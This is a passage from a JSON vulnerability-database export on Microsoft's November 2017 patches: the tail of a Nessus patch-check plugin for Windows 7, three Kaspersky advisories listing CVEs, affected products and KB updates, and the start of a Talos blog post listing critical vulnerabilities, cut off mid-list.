or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048960', '4048957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048960, 4048957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:48:11", "bulletinFamily": "info", "cvelist": ["CVE-2017-11839", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11862", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", 
"CVE-2017-11843", "CVE-2017-11874", "CVE-2017-11846", "CVE-2017-11866"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Internet Explorer. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions and obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Edge \nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11791>) \n[CVE-2017-11803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11803>) \n[CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>) \n[CVE-2017-11833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11833>) \n[CVE-2017-11834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11834>) \n[CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>) \n[CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>) \n[CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>) \n[CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>) \n[CVE-2017-11840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11840>) \n[CVE-2017-11841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11841>) \n[CVE-2017-11843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11843>) 
\n[CVE-2017-11844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11844>) \n[CVE-2017-11845](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11845>) \n[CVE-2017-11846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11846>) \n[CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>) \n[CVE-2017-11855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11855>) \n[CVE-2017-11856](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11856>) \n[CVE-2017-11858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11858>) \n[CVE-2017-11861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11861>) \n[CVE-2017-11862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11862>) \n[CVE-2017-11863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11863>) \n[CVE-2017-11866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11866>) \n[CVE-2017-11869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11869>) \n[CVE-2017-11870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11870>) \n[CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>) \n[CVE-2017-11872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11872>) \n[CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>) \n[CVE-2017-11874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11874>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### 
*CVE-IDS*:\n[CVE-2017-11791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11791>)3.1Warning \n[CVE-2017-11803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11803>)4.3Warning \n[CVE-2017-11827](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11827>)9.3Critical \n[CVE-2017-11833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11833>)2.6Warning \n[CVE-2017-11834](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11834>)2.6Warning \n[CVE-2017-11836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11836>)7.5Critical \n[CVE-2017-11837](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11837>)7.5Critical \n[CVE-2017-11838](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11838>)7.5Critical \n[CVE-2017-11839](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11839>)7.6Critical \n[CVE-2017-11840](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11840>)7.5Critical \n[CVE-2017-11841](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11841>)7.5Critical \n[CVE-2017-11843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11843>)7.5Critical \n[CVE-2017-11844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11844>)4.3Warning \n[CVE-2017-11845](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11845>)7.6Critical \n[CVE-2017-11846](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11846>)7.5Critical \n[CVE-2017-11848](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11848>)4.3Warning \n[CVE-2017-11855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11855>)7.6Critical \n[CVE-2017-11856](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11856>)7.6Critical \n[CVE-2017-11858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11858>)7.5Critical \n[CVE-2017-11861](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11861>)7.5Critical \n[CVE-2017-11862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11862>)7.5Critical 
\n[CVE-2017-11863](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11863>)4.3Warning \n[CVE-2017-11866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11866>)7.5Critical \n[CVE-2017-11869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11869>)7.6Critical \n[CVE-2017-11870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11870>)7.5Critical \n[CVE-2017-11871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11871>)7.5Critical \n[CVE-2017-11872](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11872>)4.3Warning \n[CVE-2017-11873](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11873>)7.5Critical \n[CVE-2017-11874](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11874>)3.1Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4048955](<http://support.microsoft.com/kb/4048955>) \n[4048952](<http://support.microsoft.com/kb/4048952>) \n[4048953](<http://support.microsoft.com/kb/4048953>) \n[4048954](<http://support.microsoft.com/kb/4048954>) \n[4048956](<http://support.microsoft.com/kb/4048956>) \n[4048957](<http://support.microsoft.com/kb/4048957>) \n[4048958](<http://support.microsoft.com/kb/4048958>) \n[4048959](<http://support.microsoft.com/kb/4048959>) \n[4047206](<http://support.microsoft.com/kb/4047206>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11140", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11140", "title": "\r KLA11140Multiple vulnerabilities in Microsoft Edge and Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:56:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", 
"CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nChakraCore \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 
Version 1709 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11831](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11831>) \n[CVE-2017-11849](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11849>) \n[CVE-2017-11855](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11855>) \n[CVE-2017-11832](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11832>) \n[CVE-2017-11835](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11835>) \n[CVE-2017-11791](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11791>) \n[CVE-2017-11851](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11851>) \n[CVE-2017-11869](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11869>) \n[CVE-2017-11848](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11848>) \n[CVE-2017-11843](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11843>) \n[CVE-2017-11852](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11852>) \n[CVE-2017-11853](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11853>) \n[CVE-2017-11846](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11846>) \n[CVE-2017-11847](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11847>) \n[CVE-2017-11788](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11788>) 
\n[CVE-2017-11880](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11880>) \n[CVE-2017-11768](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11768>) \n[CVE-2017-11858](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11858>) \n[CVE-2017-11834](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11834>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11768>)0.0Unknown \n[CVE-2017-11788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11788>)0.0Unknown \n[CVE-2017-11831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11831>)0.0Unknown \n[CVE-2017-11832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11832>)0.0Unknown \n[CVE-2017-11835](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11835>)0.0Unknown \n[CVE-2017-11847](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11847>)0.0Unknown \n[CVE-2017-11849](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11849>)0.0Unknown \n[CVE-2017-11851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11851>)0.0Unknown \n[CVE-2017-11852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11852>)0.0Unknown \n[CVE-2017-11853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11853>)0.0Unknown \n[CVE-2017-11880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11880>)0.0Unknown \n[CVE-2017-11791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11791>)0.0Unknown \n[CVE-2017-11834](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11834>)0.0Unknown \n[CVE-2017-11843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11843>)0.0Unknown \n[CVE-2017-11846](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11846>)0.0Unknown 
\n[CVE-2017-11848](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11848>)0.0Unknown \n[CVE-2017-11855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11855>)0.0Unknown \n[CVE-2017-11858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11858>)0.0Unknown \n[CVE-2017-11869](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11869>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4046184](<http://support.microsoft.com/kb/4046184>) \n[4047211](<http://support.microsoft.com/kb/4047211>) \n[4048957](<http://support.microsoft.com/kb/4048957>) \n[4048960](<http://support.microsoft.com/kb/4048960>) \n[4048968](<http://support.microsoft.com/kb/4048968>) \n[4048970](<http://support.microsoft.com/kb/4048970>) \n[4049164](<http://support.microsoft.com/kb/4049164>) \n[4047170](<http://support.microsoft.com/kb/4047170>) \n[4047206](<http://support.microsoft.com/kb/4047206>)", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11855", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11855", "title": "\r KLA11855Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:48:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11788", "CVE-2017-11832", "CVE-2017-11849", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11850", "CVE-2017-11768"], "description": "### *Detect date*:\n11/14/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11768](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11768>) \n[CVE-2017-11788](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11788>) 
\n[CVE-2017-11830](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11830>) \n[CVE-2017-11831](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11831>) \n[CVE-2017-11832](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11832>) \n[CVE-2017-11842](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11842>) \n[CVE-2017-11847](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11847>) \n[CVE-2017-11849](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11849>) \n[CVE-2017-11850](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11850>) \n[CVE-2017-11851](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11851>) \n[CVE-2017-11853](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11853>) \n[CVE-2017-11880](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11880>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-11768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11768>)0.0Unknown \n[CVE-2017-11788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11788>)0.0Unknown \n[CVE-2017-11830](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11830>)0.0Unknown \n[CVE-2017-11831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11831>)0.0Unknown \n[CVE-2017-11832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11832>)0.0Unknown \n[CVE-2017-11842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11842>)0.0Unknown \n[CVE-2017-11847](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11847>)0.0Unknown \n[CVE-2017-11849](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11849>)0.0Unknown 
\n[CVE-2017-11850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11850>)0.0Unknown \n[CVE-2017-11851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11851>)0.0Unknown \n[CVE-2017-11853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11853>)0.0Unknown \n[CVE-2017-11880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11880>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4048955](<http://support.microsoft.com/kb/4048955>) \n[4048952](<http://support.microsoft.com/kb/4048952>) \n[4048953](<http://support.microsoft.com/kb/4048953>) \n[4048954](<http://support.microsoft.com/kb/4048954>) \n[4048956](<http://support.microsoft.com/kb/4048956>) \n[4048958](<http://support.microsoft.com/kb/4048958>) \n[4048959](<http://support.microsoft.com/kb/4048959>) \n[4048961](<http://support.microsoft.com/kb/4048961>) \n[4048962](<http://support.microsoft.com/kb/4048962>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-07-22T00:00:00", "published": "2017-11-14T00:00:00", "id": "KLA11136", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11136", "title": "\r KLA11136Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-12-25T19:52:52", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11768", "CVE-2017-11770", "CVE-2017-11788", "CVE-2017-11791", "CVE-2017-11803", "CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11831", "CVE-2017-11832", "CVE-2017-11833", "CVE-2017-11834", "CVE-2017-11835", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11840", "CVE-2017-11841", "CVE-2017-11842", "CVE-2017-11843", "CVE-2017-11844", "CVE-2017-11845", "CVE-2017-11846", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11849", "CVE-2017-11850", "CVE-2017-11851", "CVE-2017-11852", "CVE-2017-11853", "CVE-2017-11854", 
"CVE-2017-11855", "CVE-2017-11856", "CVE-2017-11858", "CVE-2017-11861", "CVE-2017-11862", "CVE-2017-11863", "CVE-2017-11866", "CVE-2017-11869", "CVE-2017-11870", "CVE-2017-11871", "CVE-2017-11872", "CVE-2017-11873", "CVE-2017-11874", "CVE-2017-11876", "CVE-2017-11877", "CVE-2017-11878", "CVE-2017-11879", "CVE-2017-11880", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-11884", "CVE-2017-16367", "CVE-2017-8700"], "description": "Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 53 new vulnerabilities with 19 of them rated critical, 31 of them rated important and 3 of them rated moderate. These vulnerabilities impact Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, and more.<br /><br />In addition, an update for Adobe Reader was released which addresses CVE-2017-16367 / TALOS-2017-0356 - Adobe Acrobat Reader DC PDF Structured Hierarchy ActualText Structure Element Code Execution Vulnerability which was discovered by Aleksandar Nikolic of Cisco Talos. This vulnerability manifests as a type confusion vulnerability in the PDF parsing functionality for documents containing marked structure elements. A specifically crafted PDF document designed to trigger the vulnerability could cause an out-of-bounds access on the heap, potentially leading to arbitrary code execution. 
More details regarding this vulnerability are available <a href=\"https://talosintelligence.com/vulnerability_reports/TALOS-2017-0356\">here</a>.<br /><br /><a name='more'></a><h2 id=\"h.zgfs4ty8epb8\">Vulnerabilities Rated Critical</h2><br />The following vulnerabilities are rated \"Critical\" by Microsoft:<br /><br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836\">CVE-2017-11836 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837\">CVE-2017-11837 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838\">CVE-2017-11838 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839\">CVE-2017-11839 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11840\">CVE-2017-11840 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11841\">CVE-2017-11841 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11843\">CVE-2017-11843 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11845\">CVE-2017-11845 - Microsoft Edge Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11846\">CVE-2017-11846 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11855\">CVE-2017-11855 - Internet 
Explorer Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11856\">CVE-2017-11856 - Internet Explorer Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11858\">CVE-2017-11858 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11861\">CVE-2017-11861 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11862\">CVE-2017-11862 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11866\">CVE-2017-11866 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11869\">CVE-2017-11869 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11870\">CVE-2017-11870 - Scripting Engine 